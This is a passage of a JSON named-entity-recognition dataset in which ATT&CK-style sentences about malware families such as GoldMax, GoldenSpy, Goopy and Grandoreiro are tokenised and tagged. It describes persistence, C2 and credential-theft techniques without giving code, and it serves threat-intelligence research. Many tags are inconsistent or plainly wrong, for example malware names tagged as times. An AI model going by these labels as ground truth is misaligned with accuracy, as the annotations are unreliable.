"program", "files,", "and", "the", "user’s", "recently", "accessed", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "can", "download", "additional", "components", "from", "the", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "stores", "information", "gathered", "from", "the", "endpoint", "in", "a", "file", "named", "1.hwp." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Gold", "Dragon", "checks", "the", "running", "processes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "enumerates", "registry", "keys", "with", "the", "command", "<code>regkeyenum</code>", "and", "obtains", "information", "for", "the", "Registry", "key", "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Gold", "Dragon", "establishes", "persistence", "in", "the", "Startup", "folder." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "checks", "for", "anti-malware", "products", "and", "processes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "collects", "endpoint", "information", "using", "the", "<code>systeminfo</code>", "command." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "collects", "the", "endpoint", "victim's", "username", "and", "uses", "it", "as", "a", "basis", "for", "downloading", "additional", "components", "from", "the", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "uses", "HTTP", "for", "communication", "to", "the", "control", "servers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "B-Purp" ] }, { "tokens": [ "Gold", "Dragon", "uses", "cmd.exe", "to", "execute", "commands", "for", "discovery." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldFinder", "logged", "and", "stored", "information", "related", "to", "the", "route", "or", "hops", "a", "packet", "took", "from", "a", "compromised", "machine", "to", "a", "hardcoded", "C2", "server,", "including", "the", "target", "C2", "URL,", "HTTP", "response/status", "code,", "HTTP", "response", "headers", "and", "values,", "and", "data", "received", "from", "the", "C2", "node." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldFinder", "performed", "HTTP", "GET", "requests", "to", "check", "internet", "connectivity", "and", "identify", "HTTP", "proxy", "servers", "and", "other", "redirectors", "that", "an", "HTTP", "request", "traveled", "through." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldFinder", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "RSA-encrypted", "its", "communication", "with", "the", "C2", "server." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "GoldMax", "Linux", "variant", "has", "used", "a", "crontab", "entry", "with", "a", "<code>@reboot</code>", "line", "to", "gain", "persistence." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "decoded", "and", "decrypted", "the", "configuration", "file", "when", "executed." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "written", "AES-encrypted", "and", "Base64-encoded", "configuration", "files", "to", "disk." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "can", "exfiltrate", "files", "over", "the", "existing", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "GoldMax", "Linux", "variant", "has", "been", "executed", "with", "the", "`nohup`", "command", "to", "ignore", "hangup", "signals", "and", "continue", "to", "run", "if", "the", "terminal", "session", "was", "terminated." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "GoldMax", "has", "used", "decoy", "traffic", "to", "surround", "its", "malicious", "network", "traffic", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "impersonated", "systems", "management", "software", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "used", "filenames", "that", "matched", "the", "system", "name,", "and", "appeared", "as", "a", "scheduled", "task", "impersonating", "systems", "management", "software", "within", "the", "corresponding", "ProgramData", "subfolder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "GoldMax", "has", "used", "scheduled", "tasks", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "been", "packed", "for", "obfuscation." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "will", "check", "if", "it", "is", "being", "run", "in", "a", "virtualized", "environment", "by", "comparing", "the", "collected", "MAC", "address", "to", "<code>c8:27:cc:c2:37:5a</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "retrieved", "a", "list", "of", "the", "system's", "network", "interface", "after", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "can", "check", "the", "current", "date-time", "value", "of", "the", "compromised", "system,", "comparing", "it", "to", "the", "hardcoded", "execution", "trigger", "and", "can", "send", "the", "current", "timestamp", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "set", "an", "execution", "trigger", "date", "and", "time,", "stored", "as", "an", "ASCII", "Unix/Epoch", "time", "value." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "has", "used", "HTTPS", "and", "HTTP", "GET", "requests", "with", "custom", "HTTP", "cookies", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldMax", "can", "spawn", "a", "command", "shell,", "and", "execute", "native", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "GoldenSpy", "has", "been", "packaged", "with", "a", "legitimate", "tax", "preparation", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy's", "uninstaller", "has", "base64-encoded", "its", "variables." ], "ner_tags": [ "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "has", "exfiltrated", "host", "environment", "information", "to", "an", "external", "C2", "domain", "via", "port", "9006." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy's", "uninstaller", "can", "delete", "registry", "entries,", "files", "and", "folders,", "and", "finally", "itself", "once", "these", "tasks", "have", "been", "completed." ], "ner_tags": [ "B-Time", "B-Way", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "has", "included", "a", "program", "\"ExeProtector\",", "which", "monitors", "for", "the", "existence", "of", "GoldenSpy", "on", "the", "infected", "system", "and", "redownloads", "if", "necessary." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "constantly", "attempts", "to", "download", "and", "execute", "files", "from", "the", "remote", "C2,", "including", "GoldenSpy", "itself", "if", "not", "found", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "can", "create", "new", "users", "on", "an", "infected", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy's", "setup", "file", "installs", "initial", "executables", "under", "the", "folder", "<code>%WinDir%\\System32\\PluginManager</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "can", "execute", "remote", "commands", "in", "the", "Windows", "command", "shell", "using", "the", "<code>WinExec()</code>", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "GoldenSpy", "has", "used", "HTTP", "over", "ports", "9005", "and", "9006", "for", "network", "traffic,", "9002", "for", "C2", "requests,", "33666", "as", "a", "WebSocket,", "and", "8090", "to", "download", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "has", "gathered", "operating", "system", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy's", "installer", "has", "delayed", "installation", "of", "GoldenSpy", "for", "two", "hours", "after", "it", "reaches", "a", "victim", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "has", "used", "the", "Ryeol", "HTTP", "Client", "to", "facilitate", "HTTP", "internet", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "can", "execute", "remote", "commands", "via", "the", "command-line", "interface." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GoldenSpy", "has", "established", "persistence", "by", "running", "in", "the", "background", "as", "an", "autostart", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "had", "null", "characters", "padded", "in", "its", "malicious", "DLL", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "delete", "emails", "used", "for", "C2", "once", "the", "content", "has", "been", "copied." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "side-load", "malicious", "DLLs", "with", "legitimate", "applications", "from", "Kaspersky,", "Microsoft,", "and", "Google." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-HackOrg", "B-Way", "O", "O", "O", "O", "B-Time", "B-Org", "O", "B-Org" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "communicate", "with", "its", "C2", "over", "DNS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "exfiltrate", "documents", "from", "infected", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "used", "a", "polymorphic", "decryptor", "to", "decrypt", "itself", "at", "runtime." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "disable", "Microsoft", "Outlook's", "security", "policies", "to", "disable", "macro", "warnings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "exfiltrate", "data", "over", "the", "Microsoft", "Outlook", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "use", "a", "Microsoft", "Outlook", "backdoor", "macro", "to", "communicate", "with", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "impersonated", "the", "legitimate", "goopdate.dll,", "which", "was", "dropped", "on", "the", "target", "system", "with", "a", "legitimate", "GoogleUpdate.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "enumerate", "the", "infected", "system's", "user", "name", "via", "<code>GetUserNameW</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Goopy's", "decrypter", "have", "been", "inflated", "with", "junk", "code", "in", "between", "legitimate", "API", "functions,", "and", "also", "included", "infinite", "loops", "to", "avoid", "analysis." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "checked", "for", "the", "Google", "Updater", "process", "to", "ensure", "Goopy", "was", "loaded", "properly." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "maintain", "persistence", "by", "creating", "scheduled", "tasks", "set", "to", "run", "every", "hour." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "enumerate", "the", "infected", "system's", "user", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "use", "a", "Microsoft", "Outlook", "backdoor", "macro", "to", "communicate", "with", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "communicate", "with", "its", "C2", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "Goopy", "has", "the", "ability", "to", "use", "cmd.exe", "to", "execute", "commands", "passed", "from", "an", "Outlook", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "identify", "installed", "security", "tools", "based", "on", "window", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "use", "SSL", "in", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "utilize", "web", "services", "including", "Google", "sites", "to", "send", "and", "receive", "C2", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "added", "BMP", "images", "to", "the", "resources", "section", "of", "its", "Portable", "Executable", "(PE)", "file", "increasing", "each", "binary", "to", "at", "least", "300MB", "in", "size." ], "ner_tags": [ "B-Time", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "use", "malicious", "browser", "extensions", "to", "steal", "cookies", "and", "other", "user", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "monitor", "browser", "activity", "for", "online", "banking", "actions", "and", "display", "full-screen", "overlay", "images", "to", "block", "user", "access", "to", "the", "intended", "site", "or", "present", "additional", "data", "fields." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "bypass", "UAC", "by", "registering", "as", "the", "default", "handler", "for", ".MSC", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Grandoreiro", "can", "capture", "clipboard", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "steal", "cookie", "data", "and", "credentials", "from", "Google", "Chrome." ], "ner_tags": [ "B-SamFile", "O", "B-Purp", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "obtain", "C2", "information", "from", "Google", "Docs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "decrypt", "its", "encrypted", "internal", "strings." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "block", "the", "Deibold", "Warsaw", "GAS", "Tecnologia", "security", "tool", "at", "the", "firewall", "level." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "hook", "APIs,", "kill", "processes,", "break", "file", "system", "paths,", "and", "change", "ACLs", "to", "prevent", "security", "tools", "from", "running." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "I-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "use", "a", "DGA", "for", "hiding", "C2", "addresses,", "including", "use", "of", "an", "algorithm", "with", "a", "user-specific", "key", "that", "changes", "daily." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "used", "compromised", "websites", "and", "Google", "Ads", "to", "bait", "victims", "into", "downloading", "its", "installer." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "parse", "Outlook", ".pst", "files", "to", "extract", "e-mail", "addresses." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "Grandoreiro", "payload", "has", "been", "delivered", "encrypted", "with", "a", "custom", "XOR-based", "algorithm", "and", "also", "as", "a", "base64-encoded", "ZIP", "file." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SamFile" ] }, { "tokens": [ "Grandoreiro", "can", "send", "data", "it", "retrieves", "to", "the", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "delete", ".LNK", "files", "created", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "store", "its", "configuration", "in", "the", "Registry", "at", "`HKCU\\Software\\`", "under", "frequently", "changing", "names", "including", "<code>%USERNAME%</code>", "and", "<code>ToolTech-RM</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "download", "its", "second", "stage", "from", "a", "hardcoded", "URL", "within", "the", "loader's", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "log", "keystrokes", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "infected", "victims", "via", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Grandoreiro", "has", "used", "malicious", "links", "to", "gain", "execution", "on", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "named", "malicious", "browser", "extensions", "and", "update", "files", "to", "appear", "legitimate." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "modify", "the", "Registry", "to", "store", "its", "configuration", "at", "`HKCU\\Software\\`", "under", "frequently", "changing", "names", "including", "<code>%USERNAME%</code>", "and", "<code>ToolTech-RM</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "use", "MSI", "files", "to", "execute", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "execute", "through", "the", "<code>WinExec</code>", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Grandoreiro", "can", "identify", "installed", "security", "tools", "based", "on", "process", "names." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "use", "run", "keys", "and", "create", "link", "files", "in", "the", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "list", "installed", "security", "products", "including", "the", "Trusteer", "and", "Diebold", "Warsaw", "GAS", "Tecnologia", "online", "banking", "protections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "write", "or", "modify", "browser", "shortcuts", "to", "enable", "launching", "of", "malicious", "browser", "extensions." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "been", "spread", "via", "malicious", "links", "embedded", "in", "e-mails." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Grandoreiro", "can", "steal", "the", "victim's", "cookies", "to", "use", "for", "duplicating", "the", "active", "session", "from", "another", "device." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "detect", "VMWare", "via", "its", "I/O", "port", "and", "Virtual", "PC", "via", "the", "<code>vpcext</code>", "instruction." ], "ner_tags": [ "B-Time", "O", "O", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "collect", "the", "computer", "name", "and", "OS", "version", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "determine", "the", "IP", "and", "physical", "location", "of", "the", "compromised", "host", "via", "IPinfo." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Grandoreiro", "can", "collect", "the", "username", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "determine", "the", "time", "on", "the", "victim", "machine", "via", "IPinfo." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Grandoreiro", "can", "use", "VBScript", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "has", "the", "ability", "to", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Grandoreiro", "can", "modify", "the", "binary", "ACL", "to", "prevent", "security", "tools", "from", "running." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "steals", "files", "with", "the", "following", "extensions:", ".docx,", ".doc,", ".pptx,", ".ppt,", ".xlsx,", ".xls,", ".rtf,", "and", ".pdf." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "GravityRAT", "steals", "files", "based", "on", "an", "extension", "list", "if", "a", "USB", "drive", "is", "connected", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "has", "been", "delivered", "via", "Word", "documents", "using", "DDE", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O" ] }, { "tokens": [ "GravityRAT", "supports", "file", "encryption", "(AES", "with", "the", "key", "\"lolomycin2017\")." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "collects", "the", "volumes", "mapped", "on", "the", "system,", "and", "also", "steals", "files", "with", "the", "following", "extensions:", ".docx,", ".doc,", ".pptx,", ".ppt,", ".xlsx,", ".xls,", ".rtf,", "and", ".pdf." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "The", "author", "of", "GravityRAT", "submitted", "samples", "to", "VirusTotal", "for", "testing,", "showing", "that", "the", "author", "modified", "the", "code", "to", "try", "to", "hide", "the", "DDE", "object", "in", "a", "different", "part", "of", "the", "document." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 